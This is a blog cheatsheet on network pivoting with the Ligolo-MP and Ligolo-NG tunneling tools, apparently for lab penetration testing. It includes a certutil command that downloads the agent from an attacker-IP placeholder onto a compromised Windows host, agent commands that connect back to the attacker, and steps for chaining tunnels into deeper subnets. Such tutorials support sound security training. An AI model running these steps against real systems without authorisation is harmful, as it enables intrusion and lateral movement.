Post

Ligolo-MP/Ligolo-NG Cheatsheet

Posted
By
4 min read
Ligolo-MP/Ligolo-NG Cheatsheet

Installation

From Source

Github Ligolo-MP

git clone https://github.com/ttpreport/ligolo-mp
cd ligolo-mp
sudo make install
sudo ligolo-mp

From Release

Download Binary From Release

ligolo-mp_linux_amd64 
chmod +x ./ligolo-mp_linux_amd64 
sudo ./ligolo-mp_linux_amd64

Dashboard overview

FlagMeaning
Agent is connected, relay is down
Agent is connected, relay is up
Agent is disconnected, relay is down

Navgating the dashboard with TAB

CTRL+A admin Panel
CTRL+N generate Client Binary
CTRL+T traceroute IP
CTRL+Q quit ligolo

Interfaces

This is a list of interfaces found on the compromised machine. It could be useful for easier navigation of internal networks: which interface to run a redirector on, which networks are potentially accessible via this particular session and so on.

Routes

A list of routes is here mainly for visibility purposes: as already mentioned, the selection highlight is synchronized with sessions and redirectors, also the visual markers (those colored flags) provide a good visual representation of the current state.

Its context menu allows for deletion of selected route.

Redirectors

This is functionally the same as routes, but represents redirectors.

Its context menu allows for deletion of selected route.

Ligolo-NG

Ligolo-ng webUI Documentation

Step 1: Download Ligolo-NG Binaries

Ligolo-NG consists of two core components:

Proxy  Runs on the attacker machine (our system).
Agent  Runs on the target machine (compromised host).

On the Attacker Machine (Kali/Linux)

Navigate to a directory to store Ligolo-NG:

cd /opt
mkdir ligolo
cd ligolo

Download the proxy and agent binaries:

# Download the agent (for Windows target)
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip

# Download the proxy (for Kali/attacker machine)
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

Extract the binaries:

# Extract the agent (for Windows target)
unzip ligolo-ng_agent_0.8_windows_amd64.zip

# Extract the proxy (for Kali/attacker machine)
tar -xvf ligolo-ng_proxy_0.8_linux_amd64.tar.gz

Step 2: Set Up the Ligolo-NG Proxy on the Attacker Machine

Before launching Ligolo-NG, create a TUN interface on the attacker machine:

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

Now, start the Ligolo-NG proxy server:

#Change the directory to the ligolo directory
cd /opt/ligolo
#Run the proxy server from there
./proxy -selfcert

Step 3: Transfer the Ligolo-NG Agent on the Target Machine

We need to transfer the agent to the compromised machine using a simple Python HTTP server to serve the file:

*** Note : In our case we directly copied it to the windows Compromised machine ***
cd /opt/ligolo
sudo python3 -m http.server 80

On the target machine (Windows), download the agent from the attacker’s machine:

certutil.exe -urlcache -split -f http://<attacker_IP>/lin-agent

Step 4: Pivot to First Subnet

Now, execute the agent and connect it to the attacker’s proxy:

agent.exe -connect <attacker-machine-IP>:11601 -ignore-cert

Verify the Connection:
Once the agent is running, check the attacker machine’s proxy window. An active session should have been established. To list all active tunneled sessions, run:

#List the session
session

#Start the session
start

Step 5: Discover Internal Networks

Now that there is a foothold inside the compromised network, let’s enumerate.

On the Target Machine:

check network interfaces:

ipconfig

This will help identify additional subnets or networks to pivot into.

Step 6: Add Internal Network Routes for Pivoting

Once internal network is identified (e.g., 172.168.170.0/24), route it through Ligolo-NG:

sudo ip route add 172.168.170.0/24 dev ligolo

Pivoting to a Second Subnet

Once the second machine inside a new internal subnet has been compromised, Let’s set up another Ligolo listener and agent to continue pivoting deeper.

Why? : The first agent is limited to the subnet it can see. To reach the next layer (deeper network), we need to tunnel again — from the foothold machine.

Setting up Additional Ligolo Listeners and Agents (ligolo2, ligolo3)

Set up a second Ligolo tunnel after a successful RDP into the second compromised machine (e.g., wkstn4 with IP 172.168.170.120) :

On the attacker machine (Kali):

#Create a second TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo2
sudo ip link set ligolo2 up
#Attach back to running Ligolo proxy tmux session
tmux a -t Ligolo
# Add a new listener
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443
#Verify listeners
listener_list

On the new compromised machine
Download and execute the Ligolo agent to create the second tunnel:

agent.exe -connect <WEBSERVER>:11601 -ignore-cert

On the attacker machine, start the session:

session

start --tun ligolo2

Add the new internal network to your routes:

sudo ip route add 10.10.10.0/24 dev ligolo2

Confirm connectivity:

ping 10.10.10.128

Enumerate the new network:

nxc smb 10.10.10.0/24

Pivoting to a Multiple Subnets

Repeat for Deeper Networks

Similarly, if another host is compromised (e.g., CA.SHIELD.LOCAL machine at 10.10.10.132) and find another new network (10.10.20.0/24), repeat the same process from step 7:

Create a third TUN interface (ligolo3)
Start a new listener
Deploy another agent from the compromised machine
Route the new subnet through the new TUN (ligolo3) interface

Final setup : Fully Established Pivot Chain Across Four Networks

CheetSheets
tunnling ligolo-mp ligolo-ng
This post is licensed under CC BY 4.0 by the author.